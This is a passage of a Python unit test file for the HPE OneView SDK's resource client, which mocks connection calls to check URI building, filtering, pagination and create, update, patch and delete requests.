mock_put.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
def test_update_without_default_values(self, mock_put, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"name": "test"}
expected = {"name": "test", "uri": uri, "type": "typeV300"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update)
mock_put.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_uri(self, mock_wait4task, mock_update, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"resource_data": "resource_data", "uri": uri}
expected = {"resource_data": "resource_data", "uri": uri, "type": "typeV300"}
mock_update.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.update(dict_to_update, False)
self.assertEqual(self.task, self.resource_client.data)
mock_update.assert_called_once_with(uri, expected, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_return_entity(self, mock_wait4task, mock_put, mock_ensure_resource):
uri = "/rest/testuri"
dict_to_update = {"resource_name": "a name", "uri": uri}
mock_put.return_value = self.task, {}
mock_wait4task.return_value = dict_to_update
self.resource_client.update(dict_to_update, timeout=-1)
self.assertEqual(self.resource_client.data, dict_to_update)
@mock.patch.object(Resource, "get_by")
def test_get_by_name_with_result(self, mock_get_by):
self.resource_client.get_by_name("Resource Name,")
mock_get_by.assert_called_once_with("name", "Resource Name,")
@mock.patch.object(Resource, "get_by")
def test_get_by_name_without_result(self, mock_get_by):
mock_get_by.return_value = []
response = self.resource_client.get_by_name("Resource Name,")
self.assertIsNone(response)
mock_get_by.assert_called_once_with("name", "Resource Name,")
@mock.patch.object(connection, "get")
def test_get_by_uri(self, mock_get):
self.resource_client.get_by_uri("/rest/testuri")
mock_get.assert_called_once_with('/rest/testuri')
@mock.patch.object(connection, "get")
def test_get_by_id_with_result(self, mock_get):
self.resource_client.get_by_id("123")
mock_get.assert_called_once_with("/rest/testuri/123")
@mock.patch.object(connection, "get")
def test_get_by_id_without_result(self, mock_get):
mock_get.return_value = []
response = self.resource_client.get_by_id("123")
self.assertIsNone(response)
mock_get.assert_called_once_with("/rest/testuri/123")
@mock.patch.object(connection, "get")
def test_get_collection_uri(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
self.resource_helper.get_collection()
mock_get.assert_called_once_with(self.URI)
@mock.patch.object(connection, "get")
def test_get_collection_with_filter(self, mock_get):
mock_get.return_value = {}
self.resource_helper.get_collection(filter="name=name")
mock_get.assert_called_once_with(self.URI + "?filter=name%3Dname")
@mock.patch.object(connection, "get")
def test_get_collection_with_path(self, mock_get):
mock_get.return_value = {}
self.resource_helper.get_collection(path="/test")
mock_get.assert_called_once_with(self.URI + "/test")
@mock.patch.object(connection, "get")
def test_get_collection_with_multiple_filters(self, mock_get):
mock_get.return_value = {}
self.resource_helper.get_collection(filter=["name1=one", "name2=two", "name=three"])
mock_get.assert_called_once_with(self.URI + "?filter=name1%3Done&filter=name2%3Dtwo&filter=name%3Dthree")
@mock.patch.object(connection, "get")
def test_get_collection_should_return_list(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
collection = self.resource_helper.get_collection()
self.assertEqual(len(collection), 2)
def test_build_uri_with_id_should_work(self):
input = "09USE7335NW35"
expected_output = "/rest/testuri/09USE7335NW35"
result = self.resource_client._helper.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_uri_should_work(self):
input = "/rest/testuri/09USE7335NW3"
expected_output = "/rest/testuri/09USE7335NW3"
result = self.resource_client._helper.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_none_should_raise_exception(self):
try:
self.resource_client._helper.build_uri(None)
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_empty_str_should_raise_exception(self):
try:
self.resource_client._helper.build_uri('')
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_different_resource_uri_should_raise_exception(self):
try:
self.resource_client._helper.build_uri(
"/rest/test/another/resource/uri/09USE7335NW3")
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_incomplete_uri_should_raise_exception(self):
try:
self.resource_client._helper.build_uri("/rest/")
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_subresource_uri(self):
options = [
dict(
resource="1",
subresource="2",
path="sub",
uri="/rest/testuri/1/sub/2"),
dict(
resource="/rest/testuri/3",
subresource="4",
path="sub",
uri="/rest/testuri/3/sub/4"),
dict(
resource="5",
subresource="/rest/testuri/5/sub/6",
path="sub",
uri="/rest/testuri/5/sub/6"),
dict(
resource="/rest/testuri/7",
subresource="/rest/testuri/7/sub/8",
path="sub",
uri="/rest/testuri/7/sub/8"),
dict(
resource=None,
subresource="/rest/testuri/9/sub/10",
path="sub",
uri="/rest/testuri/9/sub/10"),
dict(
resource="/rest/testuri/11",
subresource="12",
path="/sub/",
uri="/rest/testuri/11/sub/12"),
dict(
resource="/rest/testuri/13",
subresource=None,
path="/sub/",
uri="/rest/testuri/13/sub"),
]
for option in options:
uri = self.resource_client._helper.build_subresource_uri(option["resource"], option["subresource"], option["path"])
self.assertEqual(uri, option["uri"])
def test_build_subresource_uri_with_subresourceid_and_without_resource_should_fail(self):
try:
self.resource_client._helper.build_subresource_uri(None, "123456", "sub-path")
except exceptions.HPOneViewValueError as exception:
self.assertEqual(RESOURCE_ID_OR_URI_REQUIRED, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_merge_resources(self):
resource1 = {"name": "resource1", "type": "resource"}
resource2 = {"name": "resource2", "port": "1"}
expected_resource = {"name": "resource2", "type": "resource", "port": "1"}
merged_resource = merge_resources(resource1, resource2)
self.assertEqual(merged_resource, expected_resource)
def test_merge_default_values(self):
default_type = {"type": "type1"}
resource1 = {"name": "resource1"}
resource2 = {"name": "resource2"}
result_list = merge_default_values([resource1, resource2], default_type)
expected_list = [
{"name": "resource1", "type": "type1"},
{"name": "resource2", "type": "type1"}
]
self.assertEqual(result_list, expected_list)
def test_raise_unavailable_method_exception(self):
self.assertRaises(exceptions.HPOneViewUnavailableMethod,
unavailable_method)
class FakeResource(object):
def __init__(self, con):
self._connection = con
self._client = ResourceClient(con, "/rest/fake/resource")
def get_fake(self, uri):
return self._client.get(uri)
class ResourceClientTest(unittest.TestCase):
URI = "/rest/testuri"
TYPE_V200 = 'typeV200'
TYPE_V300 = 'typeV300'
DEFAULT_VALUES = {
'200': {'type': TYPE_V200},
'300': {'type': TYPE_V300}
}
def setUp(self):
super(ResourceClientTest, self).setUp()
self.host = '127.0.0.1'
self.connection = connection(self.host, 300)
self.resource_client = ResourceClient(self.connection, self.URI)
self.task = {"task": "task", "taskState": "Finished"}
self.response_body = {"body": "body"}
self.custom_headers = {'Accept-Language': 'en_US'}
@mock.patch.object(connection, 'get')
def test_get_all_called_once(self, mock_get):
filter = "'name'='OneViewSDK \"Test FC Network'"
sort = 'name:ascending'
query = "name NE 'WrongName'"
view = '"{view-name}"'
scope_uris = '/rest/scopes/cd237b60-09e2-45c4-829e-082e318a6d2a'
mock_get.return_value = {"members": [{"member": "member"}]}
result = self.resource_client.get_all(
1, 500, filter, query, sort, view, 'name,owner,modified', scope_uris=scope_uris)
uri = '{resource_uri}?start=1' \
'&count=500' \
'&filter=%27name%27%3D%27OneViewSDK%20%22Test%20FC%20Network%27' \
'&query=name%20NE%20%27WrongName%27' \
'&sort=name%3Aascending' \
'&view=%22%7Bview-name%7D%22' \
'&fields=name%2Cowner%2Cmodified' \
'&scopeUris=/rest/scopes/cd237b60-09e2-45c4-829e-082e318a6d2a'.format(resource_uri=self.URI)
self.assertEqual([{'member': 'member'}], result)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_defaults(self, mock_get):
self.resource_client.get_all()
uri = "{resource_uri}?start=0&count=-1".format(resource_uri=self.URI)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_custom_uri(self, mock_get):
self.resource_client.get_all(uri='/rest/testuri/12467836/subresources')
uri = "/rest/testuri/12467836/subresources?start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_custom_uri_and_query_string(self, mock_get):
self.resource_client.get_all(uri='/rest/testuri/12467836/subresources?param=value')
uri = "/rest/testuri/12467836/subresources?param=value&start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_with_different_resource_uri_should_fail(self, mock_get):
try:
self.resource_client.get_all(uri='/rest/other/resource/12467836/subresources')
except exceptions.HPOneViewUnknownType as e:
self.assertEqual(UNRECOGNIZED_URI, e.args[0])
else:
self.fail('Expected Exception was not raised')
@mock.patch.object(connection, 'get')
def test_get_all_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=-1',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=3']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}, {'id': '8'}]}]
mock_get.side_effect = results
self.resource_client.get_all()
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, 'get')
def test_get_all_with_count_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=15',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=3']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}, {'id': '8'}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=15)
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, 'get')
def test_get_all_should_return_all_items_when_response_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=-1',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=1']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}]}]
mock_get.side_effect = results
result = self.resource_client.get_all()
expected_items = [{'id': '1'}, {'id': '2'}, {'id': '3'}, {'id': '4'}, {'id': '5'}, {'id': '6'}, {'id': '7'}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, 'get')
def test_get_all_should_limit_results_to_requested_count_when_response_is_paginated(self, mock_get):
uri_list = ['/rest/testuri?start=0&count=15',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=1']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}]}]
mock_get.side_effect = results
result = self.resource_client.get_all(count=15)
expected_items = [{'id': '1'}, {'id': '2'}, {'id': '3'}, {'id': '4'}, {'id': '5'}, {'id': '6'}, {'id': '7'}]
self.assertSequenceEqual(result, expected_items)
@mock.patch.object(connection, 'get')
def test_get_all_should_stop_requests_when_requested_count_reached(self, mock_get):
"""
In this case, the user provides a maximum number of results to be returned but for pagination purposes, a
nextPageUri is returned by OneView.
"""
uri_list = ['/rest/testuri?start=0&count=3',
'/rest/testuri?start=3&count=3',
'/rest/testuri?start=6&count=3']
results = [{'nextPageUri': uri_list[1], 'members': [{'id': '1'}, {'id': '2'}, {'id': '3'}]},
{'nextPageUri': uri_list[2], 'members': [{'id': '4'}, {'id': '5'}, {'id': '6'}]},
{'nextPageUri': None, 'members': [{'id': '7'}, {'id': '8'}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=3)
mock_get.assert_called_once_with(uri_list[0])
@mock.patch.object(connection, 'get')
def test_get_all_should_stop_requests_when_next_page_is_equal_to_current_page(self, mock_get):
uri = '/rest/testuri?start=0&count=-1'
members = [{'id': '1'}, {'id': '2'}, {'id': '3'}]
mock_get.return_value = {
'nextPageUri': uri,
'members': members,
'uri': uri
}
result = self.resource_client.get_all()
self.assertSequenceEqual(result, members)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, 'get')
def test_get_all_should_return_empty_list_when_response_has_no_items(self, mock_get):
mock_get.return_value = {'nextPageUri': None, 'members': []}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(connection, 'get')
def test_get_all_should_return_empty_list_when_no_members(self, mock_get):
mock_get.return_value = {'nextPageUri': None, 'members': None}
result = self.resource_client.get_all()
self.assertEqual(result, [])
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_all_called_once(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
filter = "name='Exchange Server'"
uri = "/rest/testuri?filter=name%3D%27Exchange%20Server%27&force=True"
self.resource_client.delete_all(filter=filter, force=True, timeout=-1)
mock_delete.assert_called_once_with(uri)
@mock.patch.object(connection, 'delete')
def test_delete_all_should_return_true(self, mock_delete):
mock_delete.return_value = None, self.response_body
filter = "name='Exchange Server'"
result = self.resource_client.delete_all(filter=filter, force=True, timeout=-1)
self.assertTrue(result)
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_all_should_wait_for_task(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
filter = "name='Exchange Server'"
delete_task = self.resource_client.delete_all(filter=filter, force=True, timeout=-1)
mock_wait4task.assert_called_with(self.task, timeout=-1)
self.assertEqual(self.task, delete_task)
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_by_id_called_once(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
delete_task = self.resource_client.delete('1', force=True, timeout=-1)
self.assertEqual(self.task, delete_task)
mock_delete.assert_called_once_with(self.URI + "/1?force=True", custom_headers=None)
@mock.patch.object(connection, 'delete')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_delete_with_custom_headers(self, mock_wait4task, mock_delete):
mock_delete.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
self.resource_client.delete('1', custom_headers=self.custom_headers)
mock_delete.assert_called_once_with(mock.ANY, custom_headers={'Accept-Language': 'en_US'})
def test_delete_dict_invalid_uri(self):
dict_to_delete = {"task": "task",
"uri": ""}
try:
self.resource_client.delete(dict_to_delete, False, -1)
except exceptions.HPOneViewUnknownType as e:
self.assertEqual("Unknown object type", e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'get')
def test_get_schema_uri(self, mock_get):
self.resource_client.get_schema()
mock_get.assert_called_once_with(self.URI + "/schema")
@mock.patch.object(connection, 'get')
def test_get_by_id_uri(self, mock_get):
self.resource_client.get('12345')
mock_get.assert_called_once_with(self.URI + "/12345")
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_name_with_result(self, mock_get_by):
mock_get_by.return_value = [{"name": "value"}]
response = self.resource_client.get_by_name('Resource Name,')
self.assertEqual(response, {"name": "value"})
mock_get_by.assert_called_once_with("name", 'Resource Name,')
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_name_without_result(self, mock_get_by):
mock_get_by.return_value = []
response = self.resource_client.get_by_name('Resource Name,')
self.assertIsNone(response)
mock_get_by.assert_called_once_with("name", 'Resource Name,')
@mock.patch.object(connection, 'get')
def test_get_collection_uri(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
self.resource_client.get_collection('12345')
mock_get.assert_called_once_with(self.URI + "/12345")
@mock.patch.object(connection, 'get')
def test_get_collection_with_filter(self, mock_get):
mock_get.return_value = {}
self.resource_client.get_collection('12345', 'name=name')
mock_get.assert_called_once_with(self.URI + "/12345?filter=name%3Dname")
@mock.patch.object(connection, 'get')
def test_get_collection_with_multiple_filters(self, mock_get):
mock_get.return_value = {}
self.resource_client.get_collection('12345', ['name1=one', 'name2=two', 'name=three'])
mock_get.assert_called_once_with(self.URI + "/12345?filter=name1%3Done&filter=name2%3Dtwo&filter=name%3Dthree")
@mock.patch.object(connection, 'get')
def test_get_collection_should_return_list(self, mock_get):
mock_get.return_value = {"members": [{"key": "value"}, {"key": "value"}]}
collection = self.resource_client.get_collection('12345')
self.assertEqual(len(collection), 2)
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_property(self, mock_get_all):
self.resource_client.get_by('name', 'MyFibreNetwork')
mock_get_all.assert_called_once_with(filter="\"name='MyFibreNetwork'\"", uri='/rest/testuri')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_with_incorrect_result_autofix(self, mock_get_all):
mock_get_all.return_value = [{"name": "EXpected"},
{"name": "not expected"}]
response = self.resource_client.get_by('name', 'exPEcted')
self.assertEqual(response, [{"name": "EXpected"}])
mock_get_all.assert_called_once_with(filter="\"name='exPEcted'\"", uri='/rest/testuri')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_with_incorrect_result_skip_autofix(self, mock_get_all):
mock_get_all.return_value = [{"name": "expected"},
{"name": "not expected"}]
response = self.resource_client.get_by('connection.name', 'expected')
self.assertEqual(response, [{'name': 'expected'}, {'name': 'not expected'}])
mock_get_all.assert_called_once_with(filter="\"connection.name='expected'\"", uri='/rest/testuri')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_property_with_uri(self, mock_get_all):
self.resource_client.get_by('name', 'MyFibreNetwork', uri='/rest/testuri/5435534/sub')
mock_get_all.assert_called_once_with(filter="\"name='MyFibreNetwork'\"", uri='/rest/testuri/5435534/sub')
@mock.patch.object(ResourceClient, 'get_all')
def test_get_by_property_with__invalid_uri(self, mock_get_all):
try:
self.resource_client.get_by('name', 'MyFibreNetwork', uri='/rest/other/5435534/sub')
except exceptions.HPOneViewUnknownType as e:
self.assertEqual('Unrecognized URI for this resource', e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_with_zero_body_called_once(self, mock_wait4task, mock_update):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.update_with_zero_body('/rest/enclosures/09USE133E5H4/configuration',
timeout=-1)
mock_update.assert_called_once_with(
"/rest/enclosures/09USE133E5H4/configuration", None, custom_headers=None)
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_with_zero_body_and_custom_headers(self, mock_wait4task, mock_update):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.update_with_zero_body('1', custom_headers=self.custom_headers)
mock_update.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_with_zero_body_return_entity(self, mock_wait4task, mock_put):
response_body = {"resource_name": "name"}
mock_put.return_value = self.task, self.task
mock_wait4task.return_value = response_body
result = self.resource_client.update_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, response_body)
@mock.patch.object(connection, 'put')
def test_update_with_zero_body_without_task(self, mock_put):
mock_put.return_value = None, self.response_body
result = self.resource_client.update_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, self.response_body)
@mock.patch.object(connection, 'put')
def test_update_with_uri_called_once(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
response = self.resource_client.update(dict_to_update, uri=uri)
self.assertEqual(self.response_body, response)
mock_put.assert_called_once_with(uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_with_custom_headers(self, mock_put):
dict_to_update = {"name": "test"}
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, uri="/path", custom_headers=self.custom_headers)
mock_put.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'put')
def test_update_with_force(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, uri=uri, force=True)
expected_uri = "/rest/resource/test?force=True"
mock_put.assert_called_once_with(expected_uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_with_api_version_200(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
self.connection._apiVersion = 200
expected_dict = {"name": "test", "type": self.TYPE_V200}
self.resource_client.update(dict_to_update, uri=uri, default_values=self.DEFAULT_VALUES)
mock_put.assert_called_once_with(uri, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_with_default_api_version_300(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
expected_dict = {"name": "test", "type": self.TYPE_V300}
self.resource_client.update(dict_to_update, uri=uri, default_values=self.DEFAULT_VALUES)
mock_put.assert_called_once_with(uri, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_should_not_override_resource_properties(self, mock_put):
dict_to_update = {"name": "test", "type": "anotherType"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
self.resource_client.update(dict_to_update, uri=uri, default_values=self.DEFAULT_VALUES)
mock_put.assert_called_once_with(uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
def test_update_without_default_values(self, mock_put):
dict_to_update = {"name": "test"}
uri = "/rest/resource/test"
mock_put.return_value = None, self.response_body
resource_client = ResourceClient(self.connection, self.URI)
resource_client.update(dict_to_update, uri=uri)
mock_put.assert_called_once_with(uri, dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_uri(self, mock_wait4task, mock_update):
dict_to_update = {"resource_data": "resource_data",
"uri": "a_uri"}
mock_update.return_value = self.task, self.response_body
mock_wait4task.return_value = self.task
update_task = self.resource_client.update(dict_to_update, False)
self.assertEqual(self.task, update_task)
mock_update.assert_called_once_with("a_uri", dict_to_update, custom_headers=None)
@mock.patch.object(connection, 'put')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_update_return_entity(self, mock_wait4task, mock_put):
dict_to_update = {
"resource_name": "a name",
"uri": "a_uri",
}
mock_put.return_value = self.task, {}
mock_wait4task.return_value = dict_to_update
result = self.resource_client.update(dict_to_update, timeout=-1)
self.assertEqual(result, dict_to_update)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_called_once(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body('/rest/enclosures/09USE133E5H4/configuration',
timeout=-1)
mock_post.assert_called_once_with(
"/rest/enclosures/09USE133E5H4/configuration", {}, custom_headers=None)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_called_once_without_uri(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body(timeout=-1)
mock_post.assert_called_once_with(
'/rest/testuri', {}, custom_headers=None)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_and_custom_headers(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body('1', custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_with_zero_body_return_entity(self, mock_wait4task, mock_post):
response_body = {"resource_name": "name"}
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = response_body
result = self.resource_client.create_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, response_body)
@mock.patch.object(connection, 'post')
def test_create_with_zero_body_without_task(self, mock_post):
mock_post.return_value = None, self.response_body
result = self.resource_client.create_with_zero_body(
'/rest/enclosures/09USE133E5H4/configuration', timeout=-1)
self.assertEqual(result, self.response_body)
@mock.patch.object(connection, 'post')
def test_create_uri(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_uri_with_force(self, mock_post):
dict_to_create = {"resource_name": "a name", "force": "yes"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, timeout=-1)
expected_uri = "/rest/testuri"
mock_post.assert_called_once_with(expected_uri, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_with_api_version_200(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.connection._apiVersion = 200
expected_dict = {"resource_name": "a name", "type": self.TYPE_V200}
self.resource_client.create(dict_to_create, timeout=-1, default_values=self.DEFAULT_VALUES)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_with_default_api_version_300(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
expected_dict = {"resource_name": "a name", "type": self.TYPE_V300}
self.resource_client.create(dict_to_create, timeout=-1, default_values=self.DEFAULT_VALUES)
mock_post.assert_called_once_with(self.URI, expected_dict, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_should_not_override_resource_properties(self, mock_post):
dict_to_create = {"resource_name": "a name", "type": "anotherType"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, default_values=self.DEFAULT_VALUES)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_without_default_values(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
@mock.patch.object(connection, 'post')
def test_create_with_custom_headers(self, mock_post):
dict_to_create = {"resource_name": "a name"}
mock_post.return_value = {}, {}
self.resource_client.create(dict_to_create, custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_create_return_entity(self, mock_wait4task, mock_post):
dict_to_create = {
"resource_name": "a name",
}
created_resource = {
"resource_id": "123",
"resource_name": "a name",
}
mock_post.return_value = self.task, {}
mock_wait4task.return_value = created_resource
result = self.resource_client.create(dict_to_create, -1)
self.assertEqual(result, created_resource)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_wait_for_activity_on_create(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, {}
mock_wait4task.return_value = self.task
self.resource_client.create({"test": "test"}, timeout=60)
mock_wait4task.assert_called_once_with(self.task, 60)
@mock.patch.object(connection, 'patch')
def test_patch_request_when_id_is_provided_v200(self, mock_patch):
request_body = [{
'op': 'replace',
'path': '/name',
'value': 'new_name',
}]
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', 70)
mock_patch.assert_called_once_with(
'/rest/testuri/123a53cz', request_body, custom_headers={})
@mock.patch.object(connection, 'patch')
def test_patch_request_when_id_is_provided_v300(self, mock_patch):
request_body = [{
'op': 'replace',
'path': '/name',
'value': 'new_name',
}]
mock_patch.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', 70)
mock_patch.assert_called_once_with(
'/rest/testuri/123a53cz', request_body, custom_headers={'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
def test_patch_request_when_uri_is_provided(self, mock_patch):
request_body = [{
'op': 'replace',
'path': '/name',
'value': 'new_name',
}]
mock_patch.return_value = {}, {}
self.resource_client.patch(
'/rest/testuri/123a53cz', 'replace', '/name', 'new_name', 60)
mock_patch.assert_called_once_with(
'/rest/testuri/123a53cz', request_body, custom_headers={'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
def test_patch_with_custom_headers_v200(self, mock_patch):
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch('/rest/testuri/123', 'operation', '/field', 'value',
custom_headers=self.custom_headers)
